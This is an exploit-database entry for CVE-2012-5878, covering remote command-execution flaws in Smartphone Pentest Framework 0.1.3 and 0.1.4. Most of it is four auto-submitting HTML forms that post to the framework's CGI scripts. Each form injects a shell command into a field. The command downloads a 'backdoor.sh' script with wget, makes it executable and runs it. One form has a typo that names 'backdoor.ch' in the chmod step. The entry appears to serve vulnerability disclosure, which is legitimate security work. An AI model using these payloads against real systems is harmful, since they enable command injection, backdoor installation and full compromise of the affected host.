[] NeoSense
E X P L O I T S
title author type platform port cve id

Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities

Author: High-Tech Bridge
type: webapps
platform: cgi
port: 
date_added: 2012-12-10 
date_updated: 2015-09-09 
verified: 1 
codes: CVE-2012-5878 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/56881/info

Smartphone Pentest Framework is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

Smartphone Pentest Framework 0.1.3 and 0.1.4 are vulnerable; other versions may also be affected.

1.

<form action="http://www.example.com/cgi-bin/frameworkgui/SEAttack.pl"
method="post" name=f1>
<input type="hidden" name="platformDD2" value='android' />
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.ch &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

2.

<form action="http://www.example.com/cgi-bin/frameworkgui/CSAttack.pl"
method="post" name=f1>
<input type="hidden" name="hostingPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

3.

<form
action="http://www.example.com/cgi-bin/frameworkgui/attachMobileModem.pl"
method="post" name=f1>
<input type="hidden" name="appURLPath" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>

4.

<form
action="http://www.example.com/cgi-bin/frameworkgui/guessPassword.pl"
method="post" name=f1>
<input type="hidden" name="ipAddressTB" value='a & wget
http://www.example.com/backdoor.sh && chmod a+x ./backdoor.sh &&
./backdoor.sh & ' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.